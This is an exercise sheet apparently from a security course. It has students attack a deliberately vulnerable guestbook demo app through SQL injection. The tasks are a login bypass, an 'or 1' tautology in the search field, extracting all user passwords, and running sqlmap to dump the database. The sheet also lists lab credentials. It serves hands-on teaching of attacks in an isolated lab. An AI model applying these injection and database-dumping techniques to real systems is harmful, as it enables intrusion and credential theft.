Exercise: SQL-Injection

Solutions for this exercise

Install our demo-application

Download and install our guestbook application. The Guestbook Example. Be very carefull. This example is very unstable, you should in no case install this software on a server accessible to other people, so don't forget to configure your firewall accordingly.

Test the application

For your tests, you can use the user harry (password Potter) or the user emmanuel (password emmanuel).
You can send message to one person or the a list of persons.

Use SQL-injection to hack the login

Try to login with the user benoist without using his password (it is bcde).

Search field

Using the search functionality of the guestbook application try to execute some other functionalities.
  • Change the search to add a "or 1" that makes the selection always true. You may need to see the source code, to write the sentence. Normally a user only sees the message that he or she has the right to see.
  • Hack the search functionality, such that you can see the list of all the users with their passwords.
  • Install and run sqlmap

    • Download and install SQLmap,
      $ sudo apt install sqlmap
    • Find an entrypoint that suffers a SQL injection. You must test some possible entry points to find one with the vulnerability
    • Start sqlmap on your application. You may use the wizard version.
    • Download the database structure for the site
    • Access a Dump of the database.